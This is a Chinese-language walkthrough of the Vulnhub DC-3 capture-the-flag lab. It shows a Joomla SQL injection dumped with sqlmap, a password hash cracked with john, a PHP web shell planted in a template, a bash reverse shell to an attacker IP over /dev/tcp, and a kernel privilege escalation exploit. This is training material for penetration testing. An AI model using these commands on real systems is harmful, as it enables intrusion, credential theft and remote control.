Vulnhub DC3

靶机简介

C-3是另一个专门建造的易受攻击的实验室，目的是获得渗透测试领域的经验.与以前的DC版本一样，这个版本是为初学者设计的，尽管这次只有一个标志，一个入口点，根本没有线索。Linux技能和熟悉Linux命令行是必须的，有一些基本渗透测试工具的经验也是必须的。对于初学者来说，Google可以提供很大的帮助，但是你可以随时在@DCAU7上给我发推文寻求帮助，让你重新开始。但请注意：我不会给你答案，相反，我会告诉你如何向前迈进。对于那些有过CTF和Boot2Root挑战经验的人来说，这可能根本不会花你太长时间（事实上，这可能只需要不到20分钟就可以轻松完成）。如果是这样的话，如果你想让它更具挑战性，你可以随时重做这个挑战，并探索其他获得根和获得标志的方法。

getshell

nmap详细扫描 nmap -A 192.168.43.137

发现是Joomla，那就用joomscan #一款针对joomla的安全工具扫描以下

发现版本为3.7.0，百度以下该版本漏洞

https://vulhub.org/#/environments/joomla/CVE-2017-8917/

sql注入漏洞，上sqlmap

跑出管理员账号(admin)的密码

sqlmap -u "http://192.168.43.137/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1" -p "list[fullordering]" --dump  -C password  -T "#__users" -D joomladb

采用john暴力破解他的密码hash：$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu,将此段hash密码存入新建文件pass中，然后使用john破解，可得到密码snoopy。

john pass
john --show pass

得到账号密码去后台登陆，登陆后修改模板文件，新建shell.php写入一句话getshell

蚁剑链接，目录为 /templates/beez3(主题名)/shell.php,但是反弹shell的时候一直报错

回到shell脚本处，将一句话直接修改为反弹shell命令

<?php
	exec("bash -c 'bash -i >& /dev/tcp/192.168.43.200/4444 0>&1'");
?>

然后访问shell.php即可反弹shell

提权

查看版本信息

uname -a
cat /etc/*release

搜索相关漏洞信息searchspolit ubuntu 16

选择一个合适的exp复制到到当前searchsploit -m 39772.txt

cat 39772.txt查看怎么使用它

下载exp，并通过蚁剑上传

解压并运行即可提权成功

tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compilesh
./doubleput

root目录下拿到最终flag

总结

信息收集找到cms漏洞，sql注入找到管理密码，修改模板文件getshell，内核提权。

1. 查看内核信息 uname -a ,cat /etc/*release
2. searchspolit查找相应内核漏洞